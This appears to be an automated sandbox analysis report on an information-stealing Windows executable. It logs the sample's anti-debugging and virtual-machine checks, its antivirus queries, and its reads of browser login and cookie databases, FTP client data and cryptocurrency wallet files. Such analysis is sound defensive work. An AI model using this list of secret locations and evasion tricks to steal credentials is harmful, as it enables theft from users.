                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C85097 second address: C8509B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C8509B second address: C850A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C850A1 second address: C850D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1BB4D69EAFh 0x0000000b pushad 0x0000000c jmp 00007F1BB4D69EB7h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C84EE1 second address: C84EF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BB4E5F531h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C84EF6 second address: C84EFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C84EFA second address: C84F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BB4E5F537h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C84F1B second address: C84F25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F1BB4D69EA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C8805A second address: C88076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F1BB4E5F52Dh 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F1BB4E5F526h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C88076 second address: C8807A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C82A9A second address: C82AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jmp 00007F1BB4E5F536h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C98975 second address: C98982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F1BB4D69EB2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C98982 second address: C9898C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F1BB4E5F526h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C9898C second address: C98994 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C984D0 second address: C98509 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1BB4E5F538h 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1BB4E5F536h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C98509 second address: C98534 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4D69EB1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1BB4D69EB0h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C98534 second address: C98538 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E90A7D second address: 4E90A8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BB4D69EACh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E90A8D second address: 4E90ABB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4E5F52Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F1C2691CE3Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1BB4E5F535h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E90ABB second address: 4E90AF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 5FBEE3B2h 0x00000008 jmp 00007F1BB4D69EB3h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 cmp dword ptr [769B459Ch], 05h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F1BB4D69EB5h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E90AF7 second address: 4E90AFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E90AFD second address: 4E90B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E90B01 second address: 4E90B46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F1C26934EB4h 0x0000000e jmp 00007F1BB4E5F52Fh 0x00000013 xchg eax, esi 0x00000014 jmp 00007F1BB4E5F536h 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F1BB4E5F52Eh 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E90C56 second address: 4E90C5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E90C5C second address: 4E90C60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E90C60 second address: 4E90C6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: 4E90C6F second address: 4E90C87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4E5F534h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Special instruction interceptor: First address: BC0568 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Special instruction interceptor: First address: C50EE9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe TID: 4788 Thread sleep time: -34017s >= -30000s
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe TID: 5060 Thread sleep time: -240000s >= -30000s
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe TID: 3164 Thread sleep time: -34017s >= -30000s
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Last function: Thread delayed
                Source: Amcache.hve.6.dr Binary or memory string: VMware
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
                Source: Amcache.hve.6.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: fnCae9FQhg.exe, 00000001.00000002.2570241622.0000000000915000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
                Source: Amcache.hve.6.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: Amcache.hve.6.dr Binary or memory string: vmci.sys
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
                Source: Amcache.hve.6.dr Binary or memory string: VMware20,1
                Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.6.dr Binary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.6.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.6.dr Binary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.6.dr Binary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual RAM
                Source: Amcache.hve.6.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.6.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: fnCae9FQhg.exe, 00000001.00000002.2570939408.0000000000BA6000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin
                Source: Amcache.hve.6.dr Binary or memory string: VMware, Inc.
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
                Source: Amcache.hve.6.dr Binary or memory string: VMware20,1hbin@
                Source: Amcache.hve.6.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.6.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.6.dr Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                Source: Amcache.hve.6.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: fnCae9FQhg.exe, 00000001.00000002.2570241622.00000000008D7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: fnCae9FQhg.exe, 00000001.00000003.2283151520.000000000580D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696487552p
                Source: Amcache.hve.6.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.6.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin`
                Source: Amcache.hve.6.dr Binary or memory string: \driver\vmci,\driver\pci
                Source: Amcache.hve.6.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: Amcache.hve.6.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: fnCae9FQhg.exe, 00000001.00000002.2570939408.0000000000BA6000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: fnCae9FQhg.exe, 00000001.00000003.2283206797.0000000005800000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: NTICE
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: SICE
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Code function: 1_2_009EC8B1 LdrInitializeThunk, 1_2_009EC8B1

                HIPS / PFW / Operating System Protection Evasion

                Source: fnCae9FQhg.exe, fnCae9FQhg.exe, 00000001.00000002.2571123110.0000000000BE9000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 0=Program Manager
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: Amcache.hve.6.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.6.dr Binary or memory string: msmpeng.exe
                Source: Amcache.hve.6.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.6.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                Source: fnCae9FQhg.exe, 00000001.00000003.2365046031.000000000098B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: es%\Windows Defender\MsMpeng.exe
                Source: fnCae9FQhg.exe, 00000001.00000003.2365046031.000000000099E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: les%\Windows Defender\MsMpeng.exe
                Source: fnCae9FQhg.exe, 00000001.00000003.2414518158.000000000098B000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2364429054.000000000098B000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2377455561.000000000098B000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2364429054.000000000099E000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2365046031.000000000098B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.6.dr Binary or memory string: MsMpEng.exe
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match File source: Process Memory Space: fnCae9FQhg.exe PID: 404, type: MEMORYSTR
                Source: Yara match File source: sslproxydump.pcap, type: PCAP
                Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                Source: fnCae9FQhg.exe, 00000001.00000003.2364429054.0000000000979000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\walletsk
                Source: fnCae9FQhg.exe, 00000001.00000003.2340551738.000000000098B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxx Liberty
                Source: fnCae9FQhg.exe, 00000001.00000003.2340646207.0000000000975000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: fnCae9FQhg.exe, 00000001.00000003.2307855393.00000000057CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3OL
                Source: fnCae9FQhg.exe, 00000001.00000003.2340717986.0000000000969000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: fnCae9FQhg.exe, 00000001.00000003.2340717986.0000000000969000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Roaming\Binance
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                Source: C:\Users\user\Desktop\fnCae9FQhg.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                Source: Yara match File source: Process Memory Space: fnCae9FQhg.exe PID: 404, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match File source: Process Memory Space: fnCae9FQhg.exe PID: 404, type: MEMORYSTR
                Source: Yara match File source: sslproxydump.pcap, type: PCAP
                Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
